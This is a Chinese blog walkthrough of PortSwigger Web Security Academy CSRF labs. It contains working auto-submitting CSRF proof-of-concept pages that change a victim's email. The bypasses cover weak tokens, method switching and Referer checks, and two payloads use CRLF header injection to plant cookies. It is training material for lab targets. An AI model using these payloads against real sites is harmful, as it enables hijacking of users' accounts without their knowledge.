burpsuit 靶场(Cross-site request forgery)

最新推荐文章于 2024-01-27 15:35:41 发布
最新推荐文章于 2024-01-27 15:35:41 发布
阅读量348 收藏 1
点赞数 2
文章标签: 安全 前端 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63303407/article/details/128618296
版权

没有防御的 CSRF 漏洞(1)

image-20221123215555296

给了个账号 我们先登进去

存在一个更改邮箱的页面 我们可以看到没有任何的防护 说明是存在csrf漏洞的

image-20221123215940081

我们可以选择自己写html文件 也可以使用burp自带的工具来生成

image-20221123220104003

可以选择自动提交

image-20221123220156684

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://0a6b008c04c81b0fc0979ae1008f0096.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="11&#64;qq&#46;com" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

image-20221123221523412

CSRF,其中令牌验证取决于请求方法(2)

这里的意思就是只有post才会验证csrf参数

image-20221123222347049

登录之后是有发现csrf的值的

image-20221124105543020

正常提交是没有问题的

image-20221124105651125

当csrf token的值为假时 是失败的

image-20221124105803135

这时转换请求方法进行尝试 发现成功更改并未使用csrf

image-20221124110012926

生成下

image-20221124110233980

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://0a7600ab043d4850c0c3640b00e80046.web-security-academy.net/my-account/change-email">
      <input type="hidden" name="email" value="22&#64;qq&#46;com" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

image-20221124110753418

CSRF,其中令牌验证取决于令牌是否存在(3)

image-20221124110946591

正常是没有问题的

image-20221124111004255

image-20221124111027729

发现没有csrf也可以

image-20221124111038130

image-20221124111105919

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://0a2f00b204e7242dc043093000bf00c1.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="11&#64;qq&#46;com" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

image-20221124111355644

令牌未绑定到用户会话的 CSRF(4)

意思是 你的token 也可以给别人用

image-20221124114906401

给了两个账号 先用第一个登录

image-20221124115014918

开无痕 登录第二个

image-20221124115047901

image-20221124115124720

先在第一个用户修改email时抓包 拿到token 接着把包丢弃

image-20221124120425224

dWQAl6bbzXLt8aHvmxCQS2XdS7eSI0Y7

接着修改第二个 email 其中token换成第一个拿到的值

image-20221124120457306

发现成功更改

image-20221124120348774

image-20221124120515071

因此我们采用相同的方式构造

抓包

image-20221124120633517

image-20221124120646033

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://0ae3006003973e43c0341aeb00c9003c.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="123456&#64;test&#46;com" />
      <input type="hidden" name="csrf" value="7nrtppYE23F8qs3oB0VA2RGJ1W5foM0I" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

记得丢弃抓到的包

image-20221124120747877

CSRF,其中令牌绑定到非会话 cookie(5)

image-20221124121104561

同样抓到包 发现存在csrf 和 cookie中的csrfKey两个值

image-20221124121214284

正常

image-20221124121419228

再次发送

image-20221124121523510

发现是可以复用的

尝试登录另一个账号

我们把第一个账号的两个参数都拿过来

image-20221124121852371

发现没有绑定 到账号上面

image-20221124121901657

那么我们现在需要做的就是在别人的请求包中添加上这个cookie csrfKey和 csrf

这里有一个search 发现可以给cookie进行赋值

image-20221124122729763

这样就设置好了 csrfkey 通过换行就能设置好了

image-20221124125836797

image-20221124130535385

稍微修改一下

image-20221124130609974

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://0a410098031c7fd3c13b523700e20056.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="123456&#64;test&#46;com" />
      <input type="hidden" name="csrf" value="Hc4LgCKxybDhQWK6hriRpAGfzKPue6l6" />
      <input type="submit" value="Submit request" />
    </form>
    <img src="https://0a410098031c7fd3c13b523700e20056.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrfKey=q8gTQcg4f8qsNCBamHWnMFTnCQL44BLb%3b%20SameSite=None" onerror="document.forms[0].submit()">
  </body>
</html>

image-20221124130846208

CSRF,其中 token 在 cookie 中重复

image-20221124130950192

和上一道差不多

image-20221124131539345

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://0a9c004903734ce1c082303e0015007f.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="123456&#64;test&#46;com" />
      <input type="hidden" name="csrf" value="UvH5CgyvuAIvKbZOxplKV5XwHoRJD0AL" />
      <input type="submit" value="Submit request" />
    </form>
    <img src="https://0a9c004903734ce1c082303e0015007f.web-security-academy.net/?search=1%0d%0aSet-Cookie:%20csrf=UvH5CgyvuAIvKbZOxplKV5XwHoRJD0AL%3b%20SameSite=None" onerror="document.forms[0].submit()">
  </body>
</html>

image-20221124131927712

CSRF,其中 Referer 验证取决于标头是否存在

image-20221124132720311

当更改referer的时候请求被拒绝

image-20221124132708791

但是完全删除请求可以被接受

image-20221124132744354

<html>
<head>
    <meta name="referrer" content="no-referrer"/>
</head>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://0a0e00cb04f5a2e4c0fba1a3000700a7.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="123456&#64;test&#46;com" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

添加no-referrer

image-20221124133826361

CSRF 与损坏的 Referer 验证

image-20221124134953860

同样是referer

image-20221124134940838

当referer中包含这一字符时即可

image-20221124135027089

image-20221124135231232

我们来看payload

<html>
<head>
    <meta name="referrer" content="unsafe-url"/>
</head>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/?https://0a0700ee03ef7fabc1205a9500ee00cf.web-security-academy.net')</script>
    <form action="https://0a0700ee03ef7fabc1205a9500ee00cf.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="123456&#64;test&#46;com" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

其中 history.pushState 可以无刷新的在当前history中插入一条历史状态

这里还需要添加 unsafe-url

image-20221124140840565

wanan0red
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Robust Defenses for Cross-Site Request Forgery
09-29
Cross-Site Request Forgery (CSRF) is a widely exploited web site vulnerability. In this paper, we present a new vari- ation on CSRF attacks, login CSRF, in which the attacker forges a cross-site ...
burpsuit 靶场(Cross-site scripting)
wanan的博客
01-22 1784
burpsuit 靶场(Cross-site scripting)
Burp Suite靶场练习——暴力破解(pikache靶场
p36273的博客
06-05 4300
靶场一共有4关,现我们就开始通关吧。Token 是在服务端产生的。如果前端使用用户名/密码向服务端请求认证,服务端认证成功,那么在服务端会返回 Token 给前端前端可以在每次请求的时候带上 Token 证明自己的合法地位。如果这个 Token 在服务端持久化(比如存入数据库),那它就是一个永久的身份令牌。Token 完全由应用管理,所以它可以避开同源策略Token 可以避免 CSRF 攻击Token 可以是无状态的,可以在多个服务间共享BurpSuite爆破的几种模式攻击模式。
JWT攻击详解 --Burp suit官方靶场
m0_60742333的博客
03-23 1813
JWT详解:JSON 网络令牌 (JWT) 是一种标准化格式,用于在系统之间发送加密签名的 JSON 数据。它们理论上可以包含任何类型的数据,但最常用于发送有关用户的信息(“声明”),作为身份验证、会话处理和访问控制机制的一部分。
burp靶场--XXE注入
qq_33168924的博客
01-16 1017
XML 外部实体注入(也称为 XXE)是一种 Web 安全漏洞,允许攻击者干扰应用程序对 XML 数据的处理。它通常允许攻击者查看应用程序服务器文件系统上的文件,并与应用程序本身可以访问的任何后端或外部系统进行交互。在某些情况下,攻击者可以利用 XXE 漏洞执行服务器端请求伪造(SSRF) 攻击,升级 XXE 攻击以危害底层服务器或其他后端基础设施。
burp靶场通关教程1
逍遥小哥的博客
10-12 520
因为这是个普通用户的凭据,这里显示false,那么我们访问管理页面把后面的admin=false粘上去 并改为true(如果有admin=就不用粘贴了,我这访问admin管理面本cookie里面没有admin=false)我们先访问robots.txt 这里提示里面存在管理面板的路径(没有做鉴权,通过不受保护的管理功能这个提示,应该直接访问管理面板路径就可以删除carlos用户了)第一这个--是注释,其次为什么要给administrator后面加单引号,因为这是字符串要闭合,不闭合就报错了。
CSRF(英语:Cross-site request forgery)浅析.md
01-26
CSRF(英语:Cross-site request forgery)浅析.md
Exploit-DMA-Radius-Manager-4.4.0---Cross-Site-Request-Forgery-CSRF-:DMA Radius Manager 4.4.0-跨站请求伪造(CSRF
04-10
利用DMA半径管理器-4.4.0 ---跨站点请求伪造CSRF- DMA Radius Manager 4.4.0-跨站请求伪造(CSRF
Copy-Move-Image-Forgery-Detection-master.zip_copy move forgery_c
07-15
copy move forgery detection matlab program mand source code
ring-anti-forgery:环中间件以防止CSRF攻击
04-27
Ring-Anti-forgery已移至: : Ring-Anti-Forgery已移至Ring GitHub组织。 该存储库将不再更新,因此请更新您的书签和GitHub监视。
burp靶场--CSRF
qq_33168924的博客
01-25 1182
应用程序不校验csrf的有效性,只是对比body中与cookie中csrf的值是否相同,相同就接受请求,由于搜索功能没有csrf保护,并且存在cookie注入,所以可以使用搜索中cookie注入修改cookie的csrf与bodycsrf一致造成csrf攻击。步骤1:登陆两个账户,将账户A的csrfkey与csrf值替换给第二个账户B中使用,用来请求修改邮箱地址,修改成功,但是由于cookie被修改会导致账户退出,并且发现搜索功能存在cookie注入【注入的数据可以修改客户端cookie设置】,所以结合。
burpsuit 靶场( HTTP request smuggling)
wanan的博客
01-22 1774
burpsuit 靶场( HTTP request smuggling)
burp靶场--ssrf
qq_33168924的博客
01-17 1217
服务器端请求伪造是一种 Web 安全漏洞,允许攻击者导致服务器端应用程序向非预期位置发出请求。在典型的 SSRF 攻击中,攻击者可能会导致服务器连接到组织基础设施内的仅供内部使用的服务。在其他情况下,他们可能能够强制服务器连接到任意外部系统。这可能会泄露敏感数据,例如授权凭据,或者代码执行。
Burpsuite靶场练习历程(一)--Authentication.Vulnerabilities in password-based login
absoluty_wk的博客
11-11 4154
一、前言 博主本人从普通测试转职安全测试已有一年多,之前的公司项目是个嵌入式平台,工作中更多相关安全流程及前移,最终跳槽。现在工作现内容为web测试与SDL流程相结合,虽有更多机会进行安全渗透,但也愈感半路出家的自己自身能力之不足。 一方面工作同时磨练自己技术,一方面网上学习大佬们的博客开拓眼界。逐渐萌生自己创作博客的念头,刚好最近空闲时刷burp靶场打磨基础,遂将自己的学习过程分享出来,也算是对自己学习的一种激励和记录。 burp靶场地址:Learni...
burp靶场-path traversal
qq_33168924的博客
01-15 470
修改filename值:filename=…/etc/passwd。修改GET url:/image?读取:/etc/passwd。
burp靶场--身份认证漏洞
最新发布
qq_33168924的博客
01-27 773
退出登陆,使用calos账户登陆,验证安全码的时候直接使用上面url访问,用户登陆成功:直接浏览器访问:https://0a78009d03047752845a0ea90095008a.web-security-academy.net/my-account。第一步:登陆查看正常用户wiener,发现cookie的加密方式为:username+‘:’+md5HashOfPassword 【与上一个实验操作一样,步骤略…步骤3:构造重置密码链接,修改其中的token和要重置的账户用户名,重置密码。
burpsuit 靶场(Web cache poisoning)
wanan的博客
01-23 299
burpsuit 靶场(Web cache poisoning)
burp靶场--访问控制【越权】
qq_33168924的博客
01-21 1006
https://portswigger.net/web-security/access-control/lab-unprotected-admin-functionalityhttps://portswigger.net/web-security/access-control#what-is-access-control 实验1:不受保护的管理功能 管理面板不受凭据保护: 某些应用程序在登录时确定用户的访问权限或角色,然后将此信息存储在用户可控制的位置,如隐藏字段、cookie或预设查询字符串参
burp靶场--host攻击
qq_33168924的博客
01-23 527
【代码】burp靶场--host攻击。
cross-site request forgery
03-16
跨站请求伪造(Cross-Site Request ForgeryCSRF)是一种网络攻击方式,攻击者通过伪造用户的请求,让用户在不知情的情况下执行某些操作,例如转账、修改密码等。攻击者通常会通过欺骗用户点击恶意链接或者在受害者...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值